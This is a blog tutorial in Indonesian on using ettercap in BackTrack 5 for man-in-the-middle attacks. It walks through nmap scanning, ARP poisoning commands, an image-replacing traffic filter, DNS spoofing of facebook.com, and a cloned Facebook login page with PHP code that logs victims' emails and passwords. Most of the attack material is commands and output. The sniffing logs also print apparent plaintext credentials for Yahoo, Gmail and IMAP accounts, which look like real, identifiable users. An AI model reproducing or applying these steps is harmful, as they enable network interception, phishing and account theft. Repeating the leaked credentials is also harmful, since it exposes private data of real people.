ettercap di backtrack 5

Sebenarnya ini hanyalah update dari postingan saya sebelumnya .. namun kali ini saya menggunakan Backtrack V dan agak melengkapi fiture-fiture ettercap. Ettercap biasa di sebut sebagai Swiss Army Knife, Ettercap sebenarnya merupakan tools yang sering di gunakan untuk metode penyerangan MITM ( man on the middle attack ). Banyak varian serangan pada MITM, sebut saja sniffing, spoofing, phissing, cookies hijacking dan masih banyak lagi. Ok saya deskripsikan percobaan saya.
1. Attacker : backtrack V R1
Ip address :

Link encap:Ethernet HWaddr f4:ec:38:99:60:f3
 inet addr:192.168.1.6 Bcast:192.168.1.255 Mask:255.255.255.0
 inet6 addr: fe80::f6ec:38ff:fe99:60f3/64 Scope:Link
 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
 RX packets:29319 errors:0 dropped:0 overruns:0 frame:0
 TX packets:30177 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000
 RX bytes:17469869 (17.4 MB) TX bytes:6132389 (6.1 MB)

2. Target : windows xp ( terinstall pada virtualbox )
Ip address : 192.169.1.14
3. Gateway : 192.168.1.1 ( tp-link modem route )
4. Accesspoint : 192.168.1.50 ( 3com )
Ok lets begin..

Langkah pertama , biasanya attacker akan mengumpulkan target terlebih dahulu. Kali ini saya gunakan nmap

zee@eichel{~}:nmap -sn -n 192.168.1.1/24
 Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-01-06 14:29 WIT
 Nmap scan report for 192.168.1.1
 Host is up (0.0076s latency).
 MAC Address: C8:64:C7:4B:B8:D0 (zte)
 Nmap scan report for 192.168.1.6 ===> Attacker
 Host is up.
 Nmap scan report for 192.168.1.14 ===> Target
 Host is up (0.0029s latency).
 MAC Address: 08:00:27:45:C0:C0 (Cadmus Computer Systems)
 Nmap scan report for 192.168.1.25
 Host is up (0.0095s latency).
 MAC Address: 1C:4B:D6:44:75:9D (AzureWave)
 Nmap scan report for 192.168.1.50
 Host is up (0.014s latency).
 MAC Address: 00:1E:C1:4C:BF:F6 (3com Europe)
 Nmap done: 256 IP addresses (5 hosts up) scanned in 2.35 seconds

Kita coba melihat hasil man dari ettercap , perbiasakan baca.. dengan membaca kita jadi tahu secara detail

ETTERCAP(8) ETTERCAP(8)
NAME
ettercap NG-0.7.3 - A multipurpose sniffer/content filter for man in
the middle attacks
***** IMPORTANT NOTE ******
Since ettercap NG (formerly 0.7.0), all the options have been changed.
Even the target specification has been changed. Please read carefully
this man page.
SYNOPSIS
ettercap [OPTIONS] [TARGET1] [TARGET2]
TARGET is in the form MAC/IPs/PORTs
where IPs and PORTs can be ranges (e.g. /192.168.0.1-30,40,50/20,22,25)
DESCRIPTION
Ettercap was born as a sniffer for switched LAN (and obviously even
"hubbed" ones), but during the development process it has gained more
and more features that have changed it to a powerful and flexible tool
for man-in-the-middle attacks. It supports active and passive dissec‐
tion of many protocols (even ciphered ones) and includes many features
for network and host analysis (such as OS fingerprint). dst...

Now what ?
PREPARE :
Jika kita menginginkan serangan sang Swiss Army Knife ini berfungsi dengan baik pada koneksi jaringan aman ssl maka kita harus memastikan bahwa redir_command_on script pada etter.conf aktif. Secara default etter.conf di backtrack linux R1 berada pada direktori

/etc/etter.conf

Untuk mengaktifkan script tadi , buka file etter.conf dengan editor kesayangan anda kemudian uncomment baris di bawah ini.

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Dump traffic pada ARP ( sniffing – dump cookies https )

Command : ettercap -T -w dump -i wlan0 -M ARP /xxx.xxx.x.x/ //

Keterangan :

1. Dump traffic dan sniffing
 2. Syntax
 T = mode text
 w = menulis ke sebuah file , dalam contoh ini adalah "dump"
 i = Interface secara spesifik ( default = eth0 )
 M = Tipe attack ( MITM )

hasil output :

zee@eichel{~}:ettercap -T -w dump -i wlan0 -M ARP /192.168.1.1/ //
 ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
 Listening on wlan0... (Ethernet)
 wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0
 Privileges dropped to UID 0 GID 0...
 28 plugins
 39 protocol dissectors
 53 ports monitored
 7587 mac vendor fingerprint
 1698 tcp OS fingerprint
 2183 known services
 Randomizing 255 hosts for scanning...
 Scanning the whole netmask for 255 hosts...
 * |==================================================>| 100.00 %
 5 hosts added to the hosts list...
 ARP poisoning victims:
 GROUP 1 : 192.168.1.1 C8:64:C7:4B:B8:D0
 GROUP 2 : ANY (all the hosts in the list)
 Starting Unified sniffing...
 Text only Interface activated...
 Hit 'h' for inline help
 Fri Jan 6 15:04:25 2012
 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | SA
 HTTP : 69.171.224.11:443 -> USER: teconhackers@yahoo.com PASS: testes INFO: http://www.facebook.com/
 Fri Jan 6 15:04:25 2012
 TCP 192.168.1.14:1116 --> 69.171.224.11:443 | P
 POST /login.php?login_attempt=1 HTTP/1.1.
 Host: www.facebook.com.
 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1.
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.
 Accept-Language: id,en-us;q=0.7,en;q=0.3.
 Accept-Encoding: gzip, deflate.
 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7.
 Connection: keep-alive.
 Referer: http://www.facebook.com/.
 Cookie: datr=-JSqTtD5bQG1_TZPO4s_w1F0; lu=RAxSgUQ56_3YJisKv_hVcK2w; lsd=5OOOR; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; 
 reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; wd=855x451; act=1325837039360%2F1%3A2; _e_qGyw_0=%5B%22qGyw%22%2C1325837031899%2C%22act%22%2C1325837031895%2C0%2C%22email%22%2C%22click%22%2C%22click%22
 %2C%22-%22%2C%22r%22%2C%22%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C648%2C37%2C0%2C838%2C16%5D; _e_qGyw_1=%5B%22qGyw%22%2C1325837039364%2C%22act%22%2C1325837039360%2C1%2C%22pass%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2
 Fri Jan 6 15:04:25 2012
 TCP 192.168.1.14:1116 --> 69.171.224.11:443 | P
 C798%2C39%2C0%2C838%2C16%5D.
 Content-Type: application/x-www-form-urlencoded.
 Content-Length: 276.
 .
 charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%
 2C%D0%84&lsd=5OOOR&locale=id_ID&email=teconhackers%40yahoo.com&pass=testes&
 default_persistent=0&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C
 %E6%B0%B4%2C%D0%94%2C%D0%84&lsd=5OOOR&timezone=-270
 Fri Jan 6 15:04:31 2012
 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P
 HTTP/1.1 200 OK.
 Cache-Control: private, no-cache, no-store, must-revalidate.
 Expires: Sat, 01 Jan 2000 00:00:00 GMT.
 P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p".
 Pragma: no-cache.
 X-Content-Type-Options: nosniff.
 X-Frame-Options: DENY.
 Set-Cookie: _e_qGyw_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly.
 Set-Cookie: _e_qGyw_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly.
 Set-Cookie: datr=-JSqTtD5bQG1_TZPO4s_w1F0; expires=Sun, 05-Jan-2014 08:04:30 GMT; path=/; domain=.facebook.com; httponly.
 Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Flogin_attempt%3D1; path=/; domain=.facebook.com.
 Set-Cookie: sfiu=AYiQWdMg0NKJJtjnR5tVGVvbNWEMxoG_LiLa0edz4Cl1Dat4VE5lNttqg66Y1AHmjG6eSmP3y8c8Q3UlogKtkOItnAr5I2uMzVEZJEd1HSvnRpbJDnULxFRjPYmUQdI5e8H4LJ2OdkxMMsOvFBT6UeBM; 
 expires=Sun, 05-Feb-2012 08:04:30 GMT; path=/; domain=.facebook.com; httponly.
 Set-Cookie: wd=deleted; expires=Thu, 01-Ja
 Fri Jan 6 15:04:31 2012
 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P
 n-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly.
 Content-Encoding: gzip.
 Content-Type: text/html; charset=utf-8.
 X-FB-Server: 10.54.101.46.
 X-Cnection: close.
 Date: Fri, 06 Jan 2012 08:04:30 GMT.
 Content-Length: 6549.
 .
 ...........\[o.Hv~._..f..n......@.d[.l...n.. JdI.E.4/..k`.,. @.......$...$.......
 8.6X......H...nOo;.d0.M....:u.....y^.o6..+.....go.?.I.NA64Y2...&*m.vW.T.x^A.l...Yg
 J..7=..I...Q. .~;."K..7......
 Fri Jan 6 15:04:31 2012
 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P
 .,.7lK.V....Z.k..h......Y.^..K.7..,....../+V.....^...Go.Z.....?..]')..z`H&m..tI..
 ....3A..D|. D`.r.....9..LL...8Q...A
 .N,M.&...6.;.
 ....0.p....tc.x ..c.....gob....w.-. 192.168.1.14:1116 | P
 .....YL#...$...lm..+B.:.C...!.Q......n/H .T...".?.kF..>[%e..pH6!.!.`2H.......h.FZ
 .m.>].|.Y.....3\......G........0.F..e..D......6...(...L.3l .1...|.2,h.Wa.H.*...U.
 ..6.......'l;..v..v6..=*.(..Fb..aF4.Z......H..,....'yC.....5t.6@u;!......2..+.GD.
 ...,..3:V..dzp.Q.{.......>.......a.F....L.F.5.v .]..z...86.2.......r....F1.&iB...
 ...lC.A...X}...m...?..w.5a..Z..P*........1(.....Z...P.=.K.
 FW6z6F#.&A...g..c.-b....5#d...6%......V`
 Fri Jan 6 15:04:32 2012
 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P
 ..4../.\.oJ...6TA...Da.2>.............ou..x...c.b.25z(...^.vYcO7.......pL.....NW4
 e.v..Z...'..tNz=.......a@.. .. Up.7.".......8X.4)....%.E...YoB....3.+*..H"|..g.0f
 .C.%.#h..bv....T...Y.[.;.6.......e_.L.X...Pm`j.h94.C_T...I..!@..4p.....Z.......y.
 w......f...0...r.......-.i.^..c..o..sL.cz...SD.ZxB.q8..S......../...o|...........
 7.....D..ar.....=t.D0aT...... '...}h...g.............].cb@.s.f......V?.M.!8....8.
 .........a*..8:,...O.._........m.y.8.8...B9..p...*.3.w9.1..5..Lu.F.m...x.*.c.N...
 .gp.....f7i..#....h.;....k..w..[3...T..r...D.t
 ..i0..X!...,o.^ 192.168.1.14:1116 | P
 r.p..9=?.\...UMst...l............e.H.y..3.i..
 .K.;b..T...Q..|..'H..?.....j{..AKj.-y......P...J....J.......y#..^.hnia=.[.....e..
 e,...%.&..R.f....V..4..Ds..}..5(.....?(.f..=.........Z.T......;..\....3.%........n
 ...rn.}.T9X._...S.X].....;-..\6.'+..|w5.s.[......F.j.h.X).j..[j.~.H..Jo...@.\...O.
 .\......=G...p3....ll.gr.F . 192.168.1.14:1116 | P
 I...Q2..v.#.....:.4..wro.....Gh..&B. .C.../.FD...n.xG..!V`.ny..hN....?tD..2.;..h.
 p........6.ob......^.T.R......=...M.ma.D.s..ui...T4.....D.}..:c............g@]..
 vW.^X...^...."...h&. ..VZ.0.>.;...mB.....\._.c.........7.".a......_.s|dk.Vp..g.v.
 .u>."....|.~..T.m..dl.....*.....Xk.....}.t.]..=.....f........#.`w.(5.{..U`.....z.
 .....0C.....~...}../....}......O~.4....'.Y..U..6.&m..3c:.=.........?.M....'.....d.
 3.........s..!.
 '3.0g..Yv...Z.........\..M...._.....c.....5/......."....W..f.P..7..JC)W..:..a^J..
 ...3D..n.G....3 o..'?..Z6@h...p.R............
 wtp.........-.f.....T.(.T.y.|.C......\.......;..+..X.H&.....W..V.q"...5.....%....
 9....p.{v....fW}..L...d...G......&..q.)...H....=.C.|..#.v..Zxw.4...CX...$2..?+.h.
 p6.kH.@
 Fri Jan 6 15:04:33 2012
 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P
 .G.j..C...4..p.sY*K..W.R..?..H..!o.D.G....=.Q..6...I:..%... ...)..."&f"}.%..uM...
 ..r.
 .s..............X..
 ,.9^.u..fe..1.....G.....U].A..?...C../.J..~.... .......!..D...M$~Oq..OF.........-
 .t.y.H...,...|....... .F..L.t!1..k`.y....`].>KC..`..%.0,DZ2x..Z...#.5.....D.D.C..
 .2.y_..c.x2........[.3.U.....1Y. 192.168.1.14:1116 | P
 k|&.......egL..Hd3.'s/...Y-...Xb.ic.....MR.~4.v#.......b...U6....E.L..7..6q....T.
 1....@.....l"s..U...;e.H....*4.....nk...E\..8) $^ q.uqU~-.........E.{....*..|^...
 Y..s^...A....9.g..^@....v=.~..^.j....e.N.7TG\d.Q.e".{../......4.7
 s .o.6........P...z
 ........C..g.V.&mg...ZJ.....U....3|_I7a........F0bH...[..........B....+.......M..
 CD..E.2.......T.hLY....{!.P........C}.............9...I... ...LaeD.j...^...m.....
 ....m.......S.5.Z.v..r....).Zm.tX:.......5......C.U..w;.buo.Y......|.x.(.0.......
 ....O...u..wLN*+sjnu~..,.k.]........A.k..l....s...B....4?.2.O%..I....x..c*..}..n.
 jw.[..nd."........{X.....B"..*..r...3\...".^L.4.......9..j.C.[.....~v.TP.8.z..z.p
 . 192.168.1.14:1116 | P
 .{.."..Fn.fX..I|.......7..J....Z.4.*9t6P..j?O7...).O.:..P.|...ep......h.dg.0..NB?
 .Qb.D...pM..|...(.....{q...(U......$..t..Y&;&(.ne.0..^..8f......#u.:f.N..-...#.;.
 .....W...c..1.1.....@......9|....M..B.....t.c..Dx.0..=.. .k../c..6.....S..8.!...A
 ...V6...(4Qb....$...'fl..........2..$A.............3Q...A.c......(.$..(....%z....
 ....?$ R.6.i.......,.m.x..,2P.....\....z.|.=...'...c..R,.......;.....Y9'*7.#E.K..
 .i
 Fri Jan 6 15:04:33 2012
 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P
 .~.4..f...P.[.......5(...f..YAN0...Rqs/Y9......C..mt....6
 .......4.9,U.,..U....[*..3..
 ...q.'../.....8A==...XM....R.D.h*7._\._.[.K31....Ze.!$..9...g.T...........C.pe..
 ...*...G....'..t..c............]QIH.....I..&J.."[.....D}...!.I.........0.wT. V. 
 .&.....sH.....t..]W.!..a..!.;4.?.....s"..,.5 ..b..oiT.R.gE.....u....X(.U..x..._.
 gT...._...hP....-.....l.....+... h.iu.(.'.......Y.. .](d......Rny%..!%m.6\.y..pQ
 ...
 [.m.c*b%..E...D..Z....Kq|.d..i.#*.Y.\....[...9......eU..b.w\......A....`% .&O.K..
 ...$....t.iQ .@... 5...g.L..@.G.1.....QP9..|..q .)..O.dY...d._.._OT...G..
 Fri Jan 6 15:04:33 2012
 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | R

Perhatikan hasil output yang saya tandai ..user name : teconhackers@yahoo.com dan pass : testes , serta cookies yang telah di dump.

METODE SERANGAN ARP POISONING + SNIFFING ATTACK

1. Metode serangan secara menyeluruh
Yang saya maksudkan dengan metode serangan secara menyeluruh adalah serangan yang menuju kepada seluruh host di bawah satu router ( gateway ).

ettercap -T -q -M ARP // //

Sangat tidak di sarankan jika target memiliki jaringan yang besar. Akan membuat komposisi komputer lambat. Mungkin dengan spec hardware yang tinggi kita memiliki kemampuan untuk melakukan metode serangan ini.

Spesifikasi syntax
 -q = quite mode ( verbose )

Kombinasi syntax untuk serangan ke seluruh network

ettercap -T -q -M ARP // //

Hasil output :

zee@eichel{~}:ettercap -T -q -i wlan0 -M ARP // //
 ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
 Listening on wlan0... (Ethernet)
 wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0
 Privileges dropped to UID 0 GID 0...
 28 plugins
 39 protocol dissectors
 53 ports monitored
 7587 mac vendor fingerprint
 1698 tcp OS fingerprint
 2183 known services
 Randomizing 255 hosts for scanning...
 Scanning the whole netmask for 255 hosts...
 * |==================================================>| 100.00 %
 5 hosts added to the hosts list...
 ARP poisoning victims:
 GROUP 1 : ANY (all the hosts in the list)
 GROUP 2 : ANY (all the hosts in the list)
 Starting Unified sniffing...
 Text only Interface activated...
 Hit 'h' for inline help
 HTTP : 69.171.228.13:443 -> USER: teconhackers@yahoo.com PASS: 
 testers INFO: https://www.facebook.com/
 HTTP : 66.163.169.186:443 -> USER: niceday PASS: 299281 
 INFO: https://login.yahoo.com/config/login_verify2?&.src=ym

2. Metode serangan terhadap satu spesifik IP
Jika jaringan terlalu besar ada baiknya kita menyerang target ip yang di tentukan. Serangan tersebut di mulai dengan syntax

ettercap -T -q -F ig.ef -M ARP /xxx.xxx.xxx.xxx/ //

Sebagai contoh kita menyerang ip target 192.168.1.14
hasil output :

zee@eichel{~}:ettercap -T -q -i wlan0 -M ARP /192.168.1.14/ //
 ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
 Listening on wlan0... (Ethernet)
 wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0
 Privileges dropped to UID 0 GID 0...
 28 plugins
 39 protocol dissectors
 53 ports monitored
 7587 mac vendor fingerprint
 1698 tcp OS fingerprint
 2183 known services
 Randomizing 255 hosts for scanning...
 Scanning the whole netmask for 255 hosts...
 * |==================================================>| 100.00 %
 4 hosts added to the hosts list...
 ARP poisoning victims:
 GROUP 1 : 192.168.1.14 08:00:27:45:C0:C0
 GROUP 2 : ANY (all the hosts in the list)
 Starting Unified sniffing...
 Text only Interface activated...
 Hit 'h' for inline help
 HTTP : 72.14.203.84:443 -> USER: zee-eichel@gmail.com 
 PASS: uufjjeiisjau INFO: 
 https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/&scc=1&ltmpl=default&ltmplcache=2

Filter ( have fun with ettercap )

Heheh sekarang kita coba bermain-main dengan ettercap ini dengan menggunakan filter-filter tertentu. Kali ini kita coba filter yang di coding oleh irongeek
Berikut ini scriptnya , copas kemudian simpan dengan nama ig.filter kemudian copile script tersebut dengan ettercap

############################################################################
 # #
 # Jolly Pwned -- ig.filter -- filter source file #
 # #
 # By Irongeek. based on code from ALoR & NaGA #
 # Along with some help from Kev and jon.dmml #
 # http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833 #
 # #
 # This program is free software; you can redistribute it and/or modify #
 # it under the terms of the GNU General Public License as published by #
 # the Free Software Foundation; either version 2 of the License, or #
 # (at your option) any later version. #
 # #
 ############################################################################
 if (ip.proto == TCP && tcp.dst == 80) {
 if (search(DATA.data, "Accept-Encoding")) {
 replace("Accept-Encoding", "Accept-Rubbish!");
 # note: replacement string is same length as original string
 msg("zapped Accept-Encoding!\n");
 }
 }
 if (ip.proto == TCP && tcp.src == 80) {
 replace("img src=", "http://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-snc7/310716_228831213842949_100001482164189_675549_1767862890_n.jpg\" ");
 replace("IMG SRC=", "http://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-snc7/310716_228831213842949_100001482164189_675549_1767862890_n.jpg\" ");
 msg("Filter Ran.\n");
 }
Compiling : etterfilter [name].filter -o [output].ef
zee@eichel{~}:etterfilter ig.filter -o ig.ef
 etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA
 12 protocol tables loaded:
 DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
 11 constants loaded:
 VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
 Parsing source file 'ig.filter' done.
 Unfolding the meta-tree done.
 Converting labels to real offsets done.
 Writing output to 'ig.ef' done.
 -> Script encoded into 16 instructions.

Penjelasan pada script filter tadi sebenarnya hanya mengganti seluruh gambar yang di buka pada browser korban dengan gambar yang di kehendaki. Untuk menjalankan ettercap dengan script filter tertentu ,

ettercap -T -q -F ig.ef -M ARP // //

Jika muncul barisan
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Berarti proses ARP Poisoning sedang berjalan dan berbagai image akan di ganti dengan image yang ditentukan, sehingga tiap kali host target atau jaringan yang telah di racuni akan melihat setiap image yang telah di ganti tersebut pada setiap website yang di bukanya pada browser.

Spoofing Plugin

Spoofing adalah salah satu tehnik MITM yang mengalihkan traffik dari jalur sebenarnya menuju kepada alamat yang di tentukan. Intinya Attacker akan memaksa target menuju pada alamat yang ditentukan attacker menggantikan alamat sebenarnya yang dituju target.
Ettercap memiliki plugin untuk melakukan jenis serangan MITM ini.
Lakukan nmap scanning seperti yang sudah saya contohkan di awal artikel ini. Setelah kita telah mendapatkan informasi network pastikan kita mengaktifkan ip forwarding pada mesin attacker.
Untuk mengaktifkan ip forwarding
Linux:

echo 1 > /proc/sys/net/ipv4/ip_forward

BSD:

sysctl -w net.inet.ip.forwarding=1

Kemudian config jalur yang akan di spoof nantinya yang di konfigurasikan pada file etter.dns. Lokasi file etter.dns secara default pada backtrack V R1

 /usr/local/share/ettercap/etter.dns

Uncommand atau ganti baris ini dengan domain yang hendak di spoof ipnya.

facebook.com A 192.168.1.6
 *.facebook.com A 192.168.1.6
 www.facebook.com PTR 192.168.1.6 # Wildcards in PTR are not allowed

Edit ip address dengan ip address pengganti , dalam hal ini saya menggunakan ip address yang di gunakan os backtrack yaitu 192.168.1.6, dan hasilnya  akan mengarahkan domain facebook.com dan www.facebook.com ke ip address 192.168.1.6
Syntax ettercap dengan plugin dns_spoof

 ettercap -T -q -i wlan0 -P dns_spoof -M ARP // //

-P = plugin
saya coba spoof ke gmail.com dengan ip 192.168.1.6
Hasil Output :

Hasil ping pada target host

Perhatikan hasil ping pada host target, ternyata domain www.gmail.com telah di arahkan ( spoofed ) ke 192.168.1.6 Berhubung saya mengaktifkan apache web server ( localhost server ) maka ketika host target membuka gmail.com melalui browser , browser akan membuka halaman localweb saya yang terdapat pada alamat 192.168.1.6

Ok semoga postingan saya ini berguna .. artikel ini akan saya update selanjutnya , kali ini akan saya tambahkan cara menanggal serangan-serangan seperti ini.

Source : Om Zee

Phissing attack di kombinasikan dengan Spoofing Attack

Phissing atau dikenal di kalangan umum sebagai fakelogin sebenarnya adalah suatu tehnik dalam man on the middle attack. Dengan memanfaatkan human error atau kelalaian internet user , maka phissing merupakan salah satu metode serangan yang tidak dapat di anggap enteng.
Phissing sendiri menurut saya merupakan aksi penipuan dengan memanfaatkan fakelogin atau halaman palsu dari suatu situs tertentu yang memiliki halaman login atau memerlukan autentifikasi user untuk menggunakan aplikasi web tersebut. Biasanya Phissher mengincar website-website jejaring social , email , dan situs internet banking. Tujuan para attacker tersebutnya sebenarnya hanya untuk mendapat username serta password dari pengguna situs-situs penting di atas yang di gunakan untuk kepentingan sendiri.
Ok ,langsung saja kali ini saya akan membuka tabir salah satu metode klasik phissing attack yang memang masih sangat work atau bisa di katakan masih berhasil di lakukan baik lewat metode NAT maupun LAN.

1. Menyiapkan fakelogin

Untuk contoh kali ini , saya akan menggunakan situs jejaring sosial paling populer saat artikel ini ditulis, saya memilih facebook.com sebagai target spoofing kali ini.

Untuk membuat fakelogin facebook , maka kita hanya tinggal membuka facebook.com kemudian kita save page indexnya dengan control kanan lalu pilih save as
Save dengan nama index.html dan save di direktori localhost atau webserver lokal anda. Karena saya menggunakan backtrack maka saya menyimpannya di direktori /var/www
Kemudian edit file index.html tadi dengan editor text anda kali ini saya gunakan gedit
Cari dengan fasilitas search ( cntrl+f ) kata action kemudian rubah isinya dengan “post.php”
action="https://www.facebook.com/login.php?login_attempt=1" 
Rubah jadi
action="post.php" 
Kemudian siapkan file post.php dengan source code di bawah ini , simpan dengan nama post.php dalam direktori yang sama dengan index.html.
<!--?php
$file = "zeeganteng.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
$handle = fopen($file, 'a');
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "// ";
?>
Perhatikan nilai pada variable $file. Disanalah script tersebut akan menyimpan hasil input pada form login dan form password. karena itu kita harus membuat sebuah file kosong zeeganteng.txt kemudian simpan pada direktori yang sama.

Bagi pengguna linux , jangan lupa untuk mengatur chmod 777 ke seluruh file agar dapat di esekusi oleh “other”

zee@eichel{/var}:chown 777 www -R
 zee@eichel{/var}:ls -l www
 total 52
 drwxrwxrwx 3 777 527 4096 2012-01-06 21:23 ./
 drwxr-xr-x 18 root root 4096 2011-11-03 18:50 ../
 drwx------ 2 777 root 4096 2012-01-06 20:56 index_files/
 -rw-r--r-- 1 777 root 34008 2012-01-06 21:16 index.html
 -rw-r--r-- 1 777 root 0 2012-01-06 21:21 zeeganteng.txt
 -rw-r--r-- 1 777 root 911 2012-01-06 21:21 post.php

Saya melakukan testing .. ke http://127.0.0.1/

2. Spoofing Attack

Setelah kita berhasil membuat fakelogin tadi , saatnya kita melakukan serangan spoofing agar korban tidak harus menulis ip address kita untuk mencapai fakelogin yang telah kita persiapkan pada direktori localhost kita. Dalam kasus ini saya memiliki ip address 192.168.1.6 maka saya melakukan spoof attack dari domain facebook.com dan mengarah kepada ip address saya. Untuk melakukan itu silahkan teman-teman membaca artikel saya sebelumnya mengenai ettercap dan dns spoofing pada alamat di bawah ini.
http://zeestuff.wordpress.com/2012/01/06/ettercap-di-backtrack-v/
zee@eichel{/var}:ettercap -T -q -i wlan0 -P dns_spoof -M ARP // //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan0… (Ethernet)
wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0
Privileges dropped to UID 0 GID 0…
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
* |==================================================>| 100.00 %
9 hosts added to the hosts list…
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing…
Text only Interface activated…
Hit ‘h’ for inline help
Activating dns_spoof plugin…
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [api-read.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-310.channel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [developers.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [touch.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-ie-w.channel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [pixel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [developers.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-244.channel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [id-id.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [es-la.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [pt-br.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [fr-fr.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [de-de.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [it-it.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [ar-ar.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [hi-in.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [zh-cn.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-310.channel.facebook.com] spoofed to [192.168.1.6]
IMAP : 74.125.157.109:993 -> USER: cassa.prodigy@gmail.com PASS: m1rw4nju4n22091985
dns_spoof: [touch.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [m.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [m.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [graph.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [api.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
